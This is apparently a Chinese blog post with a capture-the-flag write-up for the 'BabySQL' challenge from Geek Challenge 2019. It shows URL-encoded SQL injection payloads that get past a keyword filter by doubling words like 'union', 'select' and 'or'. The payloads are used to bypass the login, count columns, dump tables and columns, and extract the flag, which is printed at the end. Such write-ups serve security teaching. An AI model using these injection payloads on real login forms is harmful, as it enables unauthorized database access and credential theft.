[极客大挑战 2019]BabySQL

这个题目比上次多了一点过滤,但也就一点,可以用双写绕过。

在这里插入图片描述
这里构造oorr,因为会过滤掉中间那个or,然后语句就变为了1' or 1=1#

在这里插入图片描述
还是没变,账号是admin。接下来开始爆字段。
?username=admin&password=1'+oorrder+bbyy+1#
这里输入时候的空格在url会变成加号

在这里插入图片描述
order by 4的时候报错,字段数为3.
开始爆数据库名:
?username=admin&password=1%27+ununionion+selselectect+1%2C2%2Cdatabase%28%29%23在这里插入图片描述
开始爆表:
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23在这里插入图片描述

爆字段
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23
在这里插入图片描述
爆flag:
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23在这里插入图片描述

flag{15557f52-8110-4c9a-8993-3f6c49e5ffc9}

posted @ 2020-05-25 12:51  WakeUpp  阅读(124)  评论(0编辑  收藏  举报